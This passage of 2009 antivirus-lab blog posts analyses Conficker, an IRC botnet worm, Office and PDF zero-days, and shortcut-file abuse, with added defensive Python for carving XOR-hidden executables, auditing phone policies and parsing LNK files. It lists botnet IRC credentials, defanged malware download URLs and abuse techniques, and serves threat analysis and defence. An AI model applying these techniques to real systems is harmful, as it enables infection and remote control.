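            hits.append((off, key))
    return hits


def carve(buf: bytes, offset: int, key: int, length: int) -> bytes:
    """Decode length bytes of the embedded image starting at offset."""
    return xor_bytes(buf[offset:offset + length], key)


def make_fake_pe() -> bytes:
    """Constructed DOS header + PE signature with e_lfanew = 0x80; not a runnable executable."""
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x80)
    return bytes(dos) + b"\x00" * 0x40 + b"PE\x00\x00" + b"\x4c\x01"   # Machine = i386


def make_fake_document(key: int) -> bytes:
    """Constructed carrier: filler bytes, a plaintext 'MZ' decoy with e_lfanew = 0,
    then the XOR-encoded image, mimicking an executable hidden inside a document."""
    filler = bytes(range(256)) * 4
    decoy = b"MZ" + b"\x00" * 0x100
    return filler + decoy + xor_bytes(make_fake_pe(), key) + b"\x00" * 32


if __name__ == "__main__":
    doc = make_fake_document(0x37)
    for off, key in find_xor_encoded_pes(doc):
        print("XOR-encoded PE at offset 0x%X, key 0x%02X" % (off, key))
        print(carve(doc, off, key, 2), carve(doc, off + 0x80, key, 4))
```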

McAfee VirusScan products detect this threat as Exploit-PPT.k trojan; McAfee Anti-Malware Gateway Edition (formerly Secure Computing) detects the new exploits as Heuristic.Exploit.OLE2.CodeExec.PGPG.

Donbot – Joining The Club of Million Dollar Botnets

Microsoft recently reported a new worm found to be exploiting the MS08-067 software flaw in the wild.  Even though our products already detected it generically as W32/IRCbot.gen.a, we decided to take a closer look and make sure we proactively detect all components that the worm might be dropping or downloading.

When run, W32/IRCbot.gen.a copies itself to <system folder>\netmon.exe. It then drops a rootkit as <system folder>\drivers\sysdrv32.sys (MD5: 0e219b74e2c68a34ca09d8fe114f6d11) and hooks the Windows tcpip.sys driver to remove the outbound connection limits in Windows XP Service Pack 2 and newer. We detect this rootkit as Generic Rootkit.g trojan. It then establishes an outbound connection to a remote IRC server using the following credentials:

  • PASS h4xg4ng
  • NICK [00-USA-XP-9215671]
  • USER SP2-ojd, followed by the name of the infected computer.

This worm does indeed exploit the MS08-067 vulnerability, and uses a download-and-execute shellcode that behaves identically to Conficker’s exploit, with only some differences in implementation. It is encoded using a simple 1-byte XOR key and looks like any other standard PEB shellcode: it loads API libraries (e.g., urlmon.dll) and calls URLDownloadToFile() to download malware from already infected systems onto new targets. Unlike Conficker, which injects a downloaded DLL into running Windows processes, this worm downloads and installs a 66.scr executable file instead.

[Figure: shellcode disassembly]

As mentioned, the Conficker worm uses an exploit derived from the “ms08_067_netapi” Metasploit module to spread itself. The Metasploit framework has become a popular platform for security tool development and automation. As we can see, the latest version of Metasploit is not only used by whitehats for vulnerability assessments and penetration testing, but also for malware development. The W32/IRCbot.gen.a worm is no exception: it has remote language detection taken from Metasploit’s “smb_fingerprint()” routine implemented in the “smb.rb” module, as well as DCERPC service connection testing code located in the “client.rb” module. By using these routines, the new worm can conveniently determine which operating system and service pack it is targeting to achieve a better infection success rate. The order in which W32/IRCbot.gen.a sends the attack packets is identical to Metasploit’s MS08-067 module (ms08_067_netapi.rb):

[Figure: Wireshark capture]

Both Conficker and W32/IRCbot.gen.a use open source tools to their advantage to make their work much easier.

We went on to investigate the additional sites the worm connects to and the payload it tries to download. Packet sniffer logs show that it accesses at least two other remote servers:

  • hxxp://98.1[infected].42:443/n
  • hxxp://74.2[infected].90:88/jueo.exe

While the first server is not showing any technical activity at the time of research, the second server is still active and hosts additional malware that is installed into infected machines:

[Figure: VirusTotal results]

Well, hello Donbot! Upon investigation, the downloaded malware (MD5: 916DB2E2C2D1ED7AF89DD8EBB9C7D84C), detected generically as Generic.dx, appears to be a component of an active botnet called Donbot (also known as Bachsoy). Components of Donbot typically create a proxy on infected machines and may be used to relay spam and HTTP traffic. Except for a few, most AV vendors seem to have detection for this malware.

Until recently, Donbot has been a relatively minor player in the lucrative spam business, but it certainly looks like the Donbot authors have decided to expand the potential of their botnet. While other botnets, namely Cutwail and Rustock, continue to dominate the distribution of spam, Donbot is making an eager attempt to get a bigger share of the spam revenue pie as one of the top 5 most active botnets worldwide. Clearly, worm authors are focusing on growing their botnets, as they might not get another chance like the MS08-067 exploit in a long time.

This would also serve as yet another reminder that there could well be many computers on the Internet that are still not installed with the latest security updates - more than 5 months since the release of the MS08-067 patch.

Next Up: Office Exploits Reloaded

We’ve just seen the Microsoft Excel 0-day attacks in February. Today, Microsoft published a new Security Advisory reporting a new unpatched vulnerability in Microsoft Office PowerPoint.

McAfee Avert Labs investigated and discovered multiple attacks in the field using the PowerPoint exploit. McAfee VirusScan products detect this threat as Exploit-PPT.k trojan using the 5573 DATs, to be released on the same day.

As with most other document exploits, these PowerPoint files install malicious trojans in the background but display an innocent PowerPoint presentation to the victim as a deceptive measure. The following list shows a variety of malware files installed in these attacks:

  • fssm32.exe: 428,032 bytes (Muster.c trojan)
  • IEUpd.exe: 45,056 bytes (Muster.c trojan)
  • setup.exe: 131,072 bytes (Muster.c trojan)
  • PeerCM.exe: 80,666 bytes (Generic BackDoor.u trojan)
  • ws2_42.dll: 106,740 bytes (Generic BackDoor.u trojan)

Some of these specially crafted exploits arrived as PowerPoint Show files with the “.pps” extension. Such files typically open in full-screen mode and hide the applications running on the desktop, such as system monitoring tools that could give the victim a clue about the dodgy installation of trojans.

Please keep your DAT files up-to-date and refrain from opening any PowerPoint files from any untrusted sources until a patch is made available by the vendor. Where possible, verify with the sender to make sure what you get is what was intended.

The most common vulnerabilities used by malevolent URLs in China

Every day thousands of websites are injected with malicious code, and millions of hosts are infected by malware from these malevolent URLs. The main vulnerabilities lately are Windows-based as well as third-party application issues. This blog introduces the most common vulnerabilities used by malevolent URLs in China throughout 2008.

1. BaoFeng2 Storm
BaoFeng2 Storm is the most powerful media player used in China. The software supports multiple media formats, and it is easy to use as well as free. Multiple buffer overflows in Baofeng2 Storm allow for the downloading and execution of files. Its CVE number is CVE-2007-4816.
Reference:

http://www.baofeng.com/

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4816

2. Baidu Soba
Baidu Soba is a search bar for the Internet that integrates a powerful MP3 search, web page search, Flash search and so on. Vulnerabilities in the BaiduBar.dll in Baidu Soba allow for the download and execution of files via a specific link. According to the vulnerability description, the vulnerability exists in versions prior to 5.4. Its CVE number is CVE-2007-4105.
Reference:

http://bar.baidu.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4105

3. Xunlei Web
Xunlei Web is downloader software. Its GUI control is very browser-like. It’s important to note that people can find more and more valuable resources to download via Xunlei Web, so Xunlei Web has a great many customers. Buffer overflows in Xunlei Web before version 5.6.3.44 allow execution of arbitrary code. Its CVE number is CVE-2007-5064.
Reference:

http://dl.xunlei.com/index.htm

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5064

4. PPStream
PPStream is IPTV software based on P2P streaming techniques. It’s very popular in China. Buffer overflows in the PowerPlayer.dll in PPStream before version 2.0.1.3829 allow for the execution of arbitrary code. Its CVE number is CVE-2007-4748.
Reference:

http://www.ppstream.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4748

5. OurGame Chat
OurGame is a free gaming platform that covers all the related fields and areas of network games. It offers nearly one hundred kinds of games, including card games, casual games, large-scale network games and so on. Buffer overflows in the ConnectAndEnterRoom() method of GLChat.ocx, the OurGame Chat module, allow for the execution of arbitrary code. Its CVE number is CVE-2007-5722.
Reference:

http://www.ourgame.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5722

6. Ultra Star Reader
Ultra Star Reader is an e-book reader tool, similar to a PDF reader. Buffer overflows in Ultra Star Reader allow for the execution of arbitrary code. Its CVE number is CVE-2007-5807.
Reference:

http://www.ssreader.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5807

7. JetAudio
JetAudio is a media player with sound-effect enhancing functionality. Vulnerabilities in the JetFlExt.dll in JetAudio version 7.0.3 allow for the overwriting of arbitrary local files. Attackers can drop malware on a system via this vulnerability. Its CVE number is CVE-2007-4983.
Reference:

http://www.jetaudio.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4983

8. Xunlei Thunder
Xunlei Thunder is free downloader software. It supports multiple download protocols such as HTTP, FTP and BitTorrent. Buffer overflows in the pplayer.dll in Xunlei Thunder allow for the execution of arbitrary code. Its CVE number is CVE-2007-6144.
Reference:

http://www.xunlei.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6144

More Comments Regarding Conficker

A lot has been published about Conficker already–this blog is an addendum to our previously published “W32/Conficker: Much Ado About Nothing.” Here we offer some Conficker snippets, if you will.

First off, you may be confused by the differences between the a, b, and c variants. Let’s clear this up a bit. The Conficker.worm.a and Conficker.worm.b variants use the MS08-067 vulnerability in Microsoft’s Server Service for propagation. The latest variant, Conficker.worm.c, has included significantly updated functionality. This update, while complex and clever, was performed on Conficker.worm.a and Conficker.worm.b infections–meaning that the exploit was not included in the update’s payload. SRI International has a good write-up about this as well as other technical details. (Note: You’ll get a patch you wish you didn’t get!)

The next thing you probably want to know–and what’s probably most important to you when dealing with this–is how are you going to combat this threat? Riding to the rescue we see Avert Labs Services. They have published a practical “in the trenches” document to help you identify and combat the infection.

But beyond anti-malware protection, what else can you do?

The best way is to prevent initial, or further, infection. If you have the latest variant, you were most probably hit by the Conficker.worm.a or Conficker.worm.b variants. McAfee VirusScan or our standalone Stinger utility are useful tools. If you also have a vulnerability manager and host/network IPS you may have other avenues to explore. These tools could allow you to detect any missing MS08-067 patches, prevent code execution in the event of a buffer overflow, or detect traffic from the Conficker.worm.a and Conficker.worm.b over the wire. These steps could help you shut the door on the initial infection vector. In fact, the combined additional coverage when using McAfee (formerly Foundstone) Vulnerability Manager, McAfee Host Intrusion Prevention (formerly Host IPS), and McAfee Network Security Platform (formerly IntruShield) would give you four checks, and four signatures plus generic buffer overflow protection. That’s great additional firepower.

Another good resource? The page you are currently visiting. We’ll be sure to update you as things progress.

=== Update March 31, 2009, 7pm PDT ===

It’s already April 1 in many parts of the world. And, thankfully, so far it’s been quiet on the Conficker front. If you’re scrambling to check for Conficker infection on your systems, then check out our Conficker Detection Tool. Also, remember to keep your product signatures updated!

W32/Conficker: Much Ado About Nothing?

In the run-up to April 1, the media spotlight around the latest Conficker worm variant has reached a morbid frenzy. From being touted as an “April Fool’s joke” to outrageous headlines such as “Millions of computers expected to be destroyed”–no other worm in recent history has generated this much media attention. But what have we learned from history? From the days of Michelangelo to the recent Blaster, SoBig, Sober, and Kamasutra worms, the hype surrounding the activation or payload dates of major Internet worms has turned out to be only damp squibs.

What happens on April Fool’s Day is anyone’s guess. Although we still don’t know the real intent of the authors of the Conficker worm, they have consistently improved the worm by adding new functionality and anti-debugging tricks with every released variant. In order to resist the Conficker Cabal initiative, which recently blocked domain registrations associated with previous Conficker A and B variants, the worm authors upped the randomly generated domain count from 250 to 50,000. The intent behind generating and attempting to contact so many domains is to make it extremely difficult for security researchers to monitor sites that could potentially host a payload for the Conficker worm to download and execute.

What we do know is almost all the security vendors have thoroughly analyzed Conficker–also known as Downadup and Kido worm–and have good generic detection and cleaning in place. Uploading a couple of randomly selected Conficker binaries to the VirusTotal site consistently shows an overall anti-virus detection rate of 90 percent or above. And these high detection rates are across vendors–small or big.

To prepare for any trouble on April 1, McAfee now offers a special build of its standalone cleaning tool Stinger, which will be updated on a daily basis to include any undetected Conficker variants from the wild. This special build of Stinger can be downloaded from the Avert Tools site. We’ve also posted detailed documentation on mitigation steps that security staff within organizations can take to combat W32/Conficker. Additional McAfee product coverage information for MS08-067–the Microsoft Windows Server Service vulnerability, which is exploited by the worm–can be viewed at the McAfee Threat Center.

Please ensure that your copy of Microsoft Windows is patched and your security software is fully up to date. That way you won’t end up an April Fool.

McAfee Debuts ‘Combating Threats’ Series

McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

UPDATE MARCH 17th

Apologies for the busted links yesterday. All seem to be resolving fine now.

New Excel Trojan Hits the Net

– Update Feb 24, 10:15 PDT –
Microsoft has released a security advisory for this issue (CVE-2009-0238):
http://www.microsoft.com/technet/security/advisory/968272.mspx

Many versions of Excel are vulnerable, including 2000, 2002, 2003, 2007, 2004/2008 for Mac, Excel Viewer/Excel Viewer 2003.

A Trojan exploiting an unpatched Microsoft Excel vulnerability has been reported from the field. McAfee Avert Labs has confirmed that Microsoft Excel 2007 and 2003 are affected. Other versions may also be impacted.

McAfee DAT files identify known malicious Excel spreadsheet files as Exploit-MSExcel.r Trojan, and dropped files as BackDoor-DUE Trojan in the 5534 DATs.

As with the initial Exploit-PDF.i threat, current attacks are very targeted and limited. When successful, the exploit installs a backdoor that attempts to connect to a remote site on port 80 and waits for commands.

The mitigation for this infection is to block unknown TCP connections. However, one of the best protection methods is to remain vigilant against Excel files from untrusted sources or sent at an unexpected time until a security update is available.

What Have We Learned From Past Virus Infections?

The year 2009 has so far been a hectic one for anti-virus vendors and IT administrators alike, “thanks” to two prolific malware families: W32/Conficker and W32/Virut. Malware researchers and field engineers have literally burned the midnight oil to ensure networks are protected against these threats.

Some of the organizations that were hit with these infections had the latest Microsoft updates installed but still got infected. During the post-mortem of the outbreaks, one glaring mistake stood out.

Administrators routinely attend to distress calls from users whenever they have an issue with their machines. By habit, the admins tend to log onto the affected workstation using their own accounts—which have domain-administrator privileges. For a moment, let us assume the suspicious user’s workstation was infected with W32/Conficker. What could possibly go wrong from here?

When the W32/Conficker worm infects a machine, it scans the local network and attempts to infect machines using the credentials of the currently logged-on user. If the initial login attempt fails, then the worm attempts a brute-force attack to authenticate, using a hardcoded list of passwords. Because most organizations have enforced complex password policies these days, brute-forcing is ineffective. But the moment the administrator logs onto the affected machine using his or her domain account, W32/Conficker runs using the elevated credentials of a domain administrator. Straight away the worm can infect any host on the domain using these newly acquired administrator credentials. Shown below is a traffic-capture screenshot of this behavior.

W32/Conficker infecting via SMB

Upon copying the worm’s DLL to the System32 folder, W32/Conficker proceeds to create a scheduled job task to execute the worm at a predefined time. In a matter of minutes the entire network, with thousands of machines, gets infected.

It’s pretty much the same story with W32/Virut, a polymorphic entry-point-obscuring virus that spreads by infecting executable and script files. A machine infected with W32/Virut would scan and infect shared drives on the network using the credentials of the currently logged-on user. Because most domain users have limited write access to shared resources on the network, the infection is confined to a subset of machines. But the moment the administrator commits the cardinal sin of logging onto an infected machine, W32/Virut runs with elevated credentials and has write access to every C$ and Admin$ share on the network.

To prevent such an outbreak from happening, it is imperative that administrators refrain from logging onto a suspect machine using their own accounts. Logging on using the workstation’s local administrator account can also have the same effect; most corporate workstations are ghosted from the same image and could have the same local admin account and password.

An alternative is to use remote desktop solutions such as VNC, GoToAssist, or TeamViewer. These three are not tied to domain authentication. Once a suspect machine is identified, it should be isolated from the network for further investigation. Better safe than sorry ;-)

Malware Riding on the Tides of the Economic Crisis

A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys want precisely to fool people trying to save some money these days. Spam mails promoting bargains that supposedly help in the recession are hitting inboxes right now.

When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

In economically hard times, the malware authors do not rely only on clever and timely social engineering; they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geo-location services to better target their audience: when someone connects to the website, it determines the geographical location on the fly and inserts the actual location into the website texts. When victims see coupons for exactly their own town, the bargain list becomes all the more tempting.

As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

New BackDoor Attacks Using PDF Documents

Needless to further remind everyone, zero-day attacks are the preferred choice of cyber criminals and will continue to be so in 2009. If the recent W32/Conficker.worm (MS08-067) and Exploit-XMLhttp.d (MS08-078, MS09-002) were not good enough to prove our point, here is another one.

At the turn of 2009, malicious PDF documents were discovered to be exploiting a 0-day vulnerability affecting Adobe Reader 8.x and 9.x. While parsing a specially crafted embedded object, a bug in the reader allowed the attacker to overwrite memory at an arbitrary location. The attacks found in the field use the infamous “HeapSpray” method via JavaScript to achieve control of code execution (see below):

malicious code execution

In the above image, the eax register is specially crafted to point to the malicious shellcode that installs a trojan. When successful, the attack installs a backdoor that enforces remote control and monitoring of infected systems. Further characteristics of this backdoor and detection details are posted at http://vil.nai.com/vil/content/v_153842.htm

While the distribution of this exploit thus far appears to be targeted, new variants are expected as more information is made public. As with the Conficker experience, the lack of good patch management is a very worrying trend that deserves more attention from IT security practitioners. Adobe is expected to release a patch very soon:

http://www.adobe.com/support/security/advisories/apsa09-01.html

MS09-002 Exploit in the wild uses MSWord Lure

An exploit targeting a recently patched vulnerability in Internet Explorer 7 was discovered in the wild. Malware crooks were quick to develop a working exploit for the vulnerability in Internet Explorer 7, which was part of the February Microsoft patch release. Microsoft rated this vulnerability critical, noting the possibility of consistent exploit code. The modus operandi bears close resemblance to the zero-day attack using Word documents that we blogged about in December 2008.

The attack, delivered in the form of a maliciously crafted document, is sent out to unsuspecting users. This Word document contains an embedded ActiveX control which, upon opening, connects to a website hosting the MS09-002 exploit.

Malware authors are always working to create new and improved ways to evade detection and control compromised machines. This time, malware authors introduced obfuscation (base64 encoding) possibly to evade easy analysis and detection.

The ActiveX control facilitates connection to the malicious website to launch and execute the MS09-002 exploit.

For those who have not patched their machines, we suggest you install the MS09-002 patch immediately. It will just be a matter of time before different variants of this exploit start circulating in the wild and become incorporated into various Do-It-Yourself web attack toolkits.

The malicious Word document is detected with the current DATs as Exploit-MSWord.k and the Internet Explorer 7 exploit is detected as Exploit-XMLhttp.d / Exploit-CVE2009-0075.

Default Security Policies For HTC Touch Pro Not So Secure

Recently I bought a new cell phone: the HTC Touch Pro. Great mobile phone. Opera Mobile Web surfing is handled great. The Sprint EV-DO Rev A network is fast and it’s the most stable smart phone I’ve had so far. As a security researcher naturally I had to dig deeper into how secure this mobile phone actually is. I quickly found out things that make me wonder if the mobile handset industry has learned anything from the desktop industry as far as protecting consumers.

The first thing I did was look at the default security settings of the mobile phone. Windows Mobile keeps the policies in the registry under HKLM\Security\Policies\Policies. These policies are documented at http://msdn.microsoft.com/en-us/library/ms890461.aspx, along with the recommended settings to use as a security baseline at http://msdn.microsoft.com/en-us/library/ms889564.aspx. The first thing I noticed is that some policy settings on my phone are, by default, different from the recommended settings. Below is an analysis of two of these changed policy settings:

SL Message Policy (registry value 0000100c)
Recommended default: 2048 – SECROLE_PPG_TRUSTED
Value on HTC Touch Pro: 2112 – (SECROLE_PPG_TRUSTED | SECROLE_USER_UNAUTH)

SI Message Policy (registry value 0000100d)
Recommended default: 3072 – (SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED)
Value on HTC Touch Pro: 3136 – (SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED | SECROLE_USER_UNAUTH)

These policy settings define WAP Push SI (Service Indication) and SL (Service Load). WAP was designed to be used by operators, administrators, and others to push software updates or even ringtones directly to the phone. For some unknown reason the HTC Touch Pro has broken from the recommended security policy and added a flag (SECROLE_USER_UNAUTH) that allows unauthenticated WAP Pushes from anyone. What does this mean? It means that an attacker can send a WAP push telling you to install spyware, like FlexiSpy, which gives them full control of your mobile handset. Once installed, the attacker can obtain your private data, your passwords, call logs, and even eavesdrop using the microphone. Sound familiar? And don’t think that it has to be a WAP push with a WAP gateway etc. That’s not the only impact these settings have. A specially crafted SMS can have the same effect as sending the WAP push through a gateway. A binary SMS message can contain a WAP SL Push (using SL as it can be used to force the downloading of spyware without user intervention or prompts) that instructs the mobile handset to go to a specific URL, get the spyware, and run the spyware after receiving it. In this case, all the attacker would need is the mobile handset phone number to send the binary SMS message to.

Further research showed that binary SMS doesn’t seem to work on Sprint’s CDMA network, although it is reported to work on GSM networks such as AT&T’s. This makes me wonder what the default security policy for WAP Pushes is on AT&T’s version of the HTC Touch Pro, the HTC FUZE. In any case, unless you know you absolutely need this flag, set these security policies to the Microsoft recommended default values of 2048 and 3072, respectively. I use PHM Registry Editor, although any registry editor for Windows Mobile can be used.
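As an added example (not from the original post), here is a small Python audit that decodes these two policy values against the Microsoft recommended defaults and reports whether the SECROLE_USER_UNAUTH bit is set. It uses only the three role bits whose numeric values follow from the figures above (64, 1024 and 2048); the registry value names 0000100c and 0000100d are the ones quoted in the post, and the handset values fed in are the ones reported there.

```python
# Role bits for the three SECROLE_* flags named in the post. The numbers follow
# from the decimal policy values quoted there: 2048 = PPG_TRUSTED,
# 3072 = PPG_AUTH | PPG_TRUSTED, and the HTC values are each +64.
SECROLE_USER_UNAUTH = 64
SECROLE_PPG_AUTH = 1024
SECROLE_PPG_TRUSTED = 2048
ROLE_NAMES = {
    SECROLE_USER_UNAUTH: "SECROLE_USER_UNAUTH",
    SECROLE_PPG_AUTH: "SECROLE_PPG_AUTH",
    SECROLE_PPG_TRUSTED: "SECROLE_PPG_TRUSTED",
}

# Microsoft's recommended defaults for the two WAP Push policies, keyed by the
# value name under HKLM\Security\Policies\Policies as shown in the post.
RECOMMENDED = {
    "0000100c": ("SL Message Policy", SECROLE_PPG_TRUSTED),
    "0000100d": ("SI Message Policy", SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED),
}


def decode_roles(value: int) -> list[str]:
    """Name every bit set in a policy value, lowest bit first. Bits this script
    does not know are reported as UNKNOWN_0x.. rather than silently dropped."""
    names = []
    for bit in range(32):
        mask = 1 << bit
        if value & mask:
            names.append(ROLE_NAMES.get(mask, f"UNKNOWN_0x{mask:x}"))
    return names


def audit_policy(value_name: str, observed: int) -> dict:
    """Compare one observed policy value with its recommended default."""
    policy, recommended = RECOMMENDED[value_name]
    extra = observed & ~recommended      # roles granted beyond the baseline
    missing = recommended & ~observed    # baseline roles that were removed
    return {
        "policy": policy,
        "observed": observed,
        "recommended": recommended,
        "extra_roles": decode_roles(extra),
        "missing_roles": decode_roles(missing),
        "allows_unauthenticated_push": bool(observed & SECROLE_USER_UNAUTH),
        "compliant": extra == 0 and missing == 0,
    }


def audit_handset(values: dict[str, int]) -> list[dict]:
    """Audit every policy value we have a recommended default for."""
    return [audit_policy(name, values[name])
            for name in sorted(values) if name in RECOMMENDED]


if __name__ == "__main__":
    # Constructed sample: the two values the post reports on the HTC Touch Pro.
    htc_touch_pro = {"0000100c": 2112, "0000100d": 3136}
    for result in audit_handset(htc_touch_pro):
        status = "OK" if result["compliant"] else "DEVIATES"
        print(f"{result['policy']}: {result['observed']} ({status}); "
              f"extra={result['extra_roles']}, "
              f"unauthenticated push allowed={result['allows_unauthenticated_push']}")
```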

Abusing Shortcut files

Shortcuts, or LNK files, are small binary files that hold the path to an application, sometimes with optional parameters. They are used to run applications and are placed where users can reach them easily, such as the desktop and application launchers. LNK files are also placed in the Startup folder to run automatically at system boot. This indirect way of running applications is attractive to malware authors because shortcuts have not been brought to most users’ attention as a security concern the way executable files have. At Avert Labs, we have recently seen some malware abusing shortcut files to launch malicious files or scripts in several different ways. Here we introduce some methods we have recently seen:

  1. Create shortcut files linking to malware files
     This is an easy way to launch malware through a user’s actions or upon system reboot. These LNK files are created on the desktop, on network shares, and even in startup folders. One of the many variants of the Spy-Agent.bw trojan is known to take advantage of shortcuts to run.

  2. Parasitic infection of shortcuts
     We have seen the W32/Mokaksu virus modify all LNK files on the desktop and add the path of the malware file in front of the original path.

     The example above is the shortcut to Adobe Acrobat Reader infected with malware. The path to the malicious “Config.Msi.exe” (in the red box) is added before the original path “AcroRd32.exe” (in the yellow box). In the shortcut, the original path is treated as a parameter to the malware file. Upon clicking on the shortcut, the W32/Mokaksu malware runs and also executes the original file, all while staying in the background. Ultimately users only see the application associated with the shortcut, which makes it much harder for them to notice the infection.

  3. Scripts in the shortcuts
     Shortcuts can also contain command lines for “cmd.exe” instead of linking to executable trojan files. The Downloader-BMF trojan is such a case.

     When users click on these LNK files, the script silently drops FTP scripts that download VBS scripts from FTP servers. The downloaded VBS scripts are then responsible for downloading trojan files.

In the first two cases, shortcuts are just ways of launching malware, whereas in the last case the LNK files are standalone malicious files that need no other malicious executable, only a legitimate “cmd.exe”. This type of LNK file can be attached to emails or hosted on web sites, which means we need to be more careful with LNK files. Users can easily check shortcuts by viewing the file’s properties or opening the file in a binary editor.

If you find suspicious strings, please do not run the files but rather send the files to Avert for further research.
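To show what that inspection looks like in practice, here is an added Python example (not from the original post): it builds a few constructed shortcut files in the Shell Link binary format, extracts the target, arguments and working directory a user would otherwise read from the Properties dialog, and flags the two patterns described above (another executable passed as an argument, as with W32/Mokaksu, and cmd.exe launched with its own inline command line). The sample paths and command lines are constructed for the demonstration; the builder only emits the LinkInfo and StringData parts of the format that the parser needs.

```python
import struct

# LinkFlags bits from the Shell Link binary format (MS-SHLLINK).
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")


def build_lnk(base_path: str, args: str = "", workdir: str = "") -> bytes:
    """Build a minimal but well-formed .lnk (constructed sample for testing)."""
    flags = HAS_LINKINFO | IS_UNICODE
    flags |= HAS_ARGS if args else 0
    flags |= HAS_WORKDIR if workdir else 0
    # 76-byte ShellLinkHeader: size, CLSID, flags, attrs, 3 timestamps,
    # file size, icon index, SW_SHOWNORMAL, hotkey, three reserved fields.
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    # LinkInfo: 0x1C-byte header, VolumeID, LocalBasePath, CommonPathSuffix.
    volume = struct.pack("<IIII", 17, 3, 0, 16) + b"\x00"   # fixed drive, no label
    base = base_path.encode("ascii") + b"\x00"
    body = volume + base + b"\x00"
    info = struct.pack("<IIIIIII", 0x1C + len(body), 0x1C, 1, 0x1C,
                       0x1C + len(volume), 0, 0x1C + len(volume) + len(base))
    strings = b""
    for s in (workdir, args):   # StringData order: WORKING_DIR, ARGUMENTS
        if s:
            strings += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + info + body + strings


def parse_lnk(data: bytes) -> dict:
    """Extract the fields a user would see in the shortcut's Properties dialog."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & HAS_IDLIST:                       # skip the LinkTargetIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    target = None
    if flags & HAS_LINKINFO:
        size, _, info_flags, _, base_off = struct.unpack_from("<IIIII", data, pos)
        if info_flags & 1:                       # VolumeIDAndLocalBasePath
            end = data.index(b"\x00", pos + base_off)
            target = data[pos + base_off:end].decode("latin-1")
        pos += size

    def read_string() -> str:
        nonlocal pos
        n = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + n * width]
        pos += n * width
        return raw.decode("utf-16-le" if width == 2 else "latin-1")

    fields = {"target": target, "name": None, "relative_path": None,
              "working_dir": None, "arguments": None, "icon": None}
    for bit, key in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                     (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                     (HAS_ICON, "icon")):
        if flags & bit:
            fields[key] = read_string()
    return fields


def suspicious_reasons(fields: dict) -> list[str]:
    """Heuristics for the two abuse patterns described in the post."""
    reasons = []
    target = (fields["target"] or fields["relative_path"] or "").lower()
    args = (fields["arguments"] or "").lower()
    exe = target.rsplit("\\", 1)[-1]
    if exe == "cmd.exe" and args:
        reasons.append("launches cmd.exe with an inline command line")
    if ".exe" in args:
        reasons.append("passes another executable's path as an argument")
    return reasons


def inspect_lnk(data: bytes) -> dict:
    """Parse a shortcut and attach the list of reasons it looks suspicious."""
    fields = parse_lnk(data)
    fields["reasons"] = suspicious_reasons(fields)
    return fields


if __name__ == "__main__":
    # Constructed samples: a clean Reader shortcut, a Mokaksu-style chained one,
    # and a cmd.exe shortcut carrying its own command line.
    reader = r"C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe"
    samples = {
        "clean": build_lnk(reader),
        "chained": build_lnk(r"C:\Windows\Config.Msi.exe", args=f'"{reader}"'),
        "script": build_lnk(r"C:\Windows\System32\cmd.exe",
                            args="/c echo constructed-sample > s.txt"),
    }
    for label, blob in samples.items():
        result = inspect_lnk(blob)
        print(f"{label}: target={result['target']!r} args={result['arguments']!r} "
              f"-> {result['reasons'] or 'looks ordinary'}")
```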

The McAfee 2009 Threat Predictions

Today, we at McAfee Avert Labs released our 2009 Threat Predictions. Amongst the findings are:

Threats Hide in the Cloud
Miscreants have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2.0. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

Personalized Threats Speak Your Language
